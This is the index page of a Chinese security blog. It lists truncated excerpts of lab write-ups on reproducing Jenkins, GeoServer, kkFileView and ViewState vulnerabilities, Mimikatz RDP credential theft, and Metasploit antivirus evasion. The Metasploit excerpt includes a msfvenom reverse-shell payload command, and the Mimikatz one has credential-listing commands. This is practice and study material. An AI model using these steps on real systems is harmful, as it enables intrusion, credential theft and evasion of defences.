background picture of the home page

Hi,Friends.This is Dralon's blog.

encrypt-labs靶场搭建

靶场下载 靶场下载地址: https://github.com/SwagXz/encrypt-labs 这里选择使用docker进行搭建靶场: git clone https://github.com/Ta0ing/encrypt-labs-docker.git 下载好之后就是启动靶场 docker

thumbnail of the cover of the post

Jenkins后台内存马注入及相关命令

漏洞搭建 通过Vulhub进行漏洞环境搭建 https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897 账号/密码:admin/vulhub WEB服务端口8080 漏洞复现 内存马注入 通过账号密码登录后台,找到Scrip

thumbnail of the cover of the post

GeoServer(CVE-2024-36401)漏洞复现

漏洞环境 漏洞搭建使用vulhub,https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 影响版本 在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前。 漏洞复现 环境均为自行搭建 靶场j

thumbnail of the cover of the post

kkFileView-RCE漏洞复现

漏洞影响版本 kkFileView 4.4.0-beta以前 漏洞搭建 使用vulhub进行漏洞环境搭建 Kali IP & 目标 IP :192.168.88.206 漏洞复现 命令执行 方法:利用poc.py生成一个恶意的zip文件,并创建一个.odt文件。

thumbnail of the cover of the post

Windows-RDP-Mimikatz凭证横向

横向过程 前提是主机上保存过RDP凭证,查看命令(Administrator管理员权限): cmdkey /list 第一步:查看凭证 查看凭证文件所在位置,命令: dir /a %USERPROFILE%\AppData\Local\Microsof

thumbnail of the cover of the post

MSF-Java-免杀初体验

前言 公众号看到的文章,说生成的jar包来上线机器,C看不懂java利用AI还可以看吧。 生成SHELL 利用kali生成反弹shell的JAR包: 命令: msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.88.206 LPORT=444

thumbnail of the cover of the post

asp.NET ViewState反序列化

简单ViewState反序列化漏洞复现 漏洞环境搭建 文件编译 hello.aspx文件内容: <%@ Page Language="C#" AutoEventWireup="true" CodeBehind="hello.aspx.cs" Inherits="ViewStateTe

thumbnail of the cover of the post

apk反编译

相关工具 dex2jar,将java.dex编译成jar文件。下载地址:https://github.com/pxb1988/dex2jar/ jd-gui.jar,反编译jar文件,查看java源码。下载地址:https://github.com/java-decompiler/jd-gui de

thumbnail of the cover of the post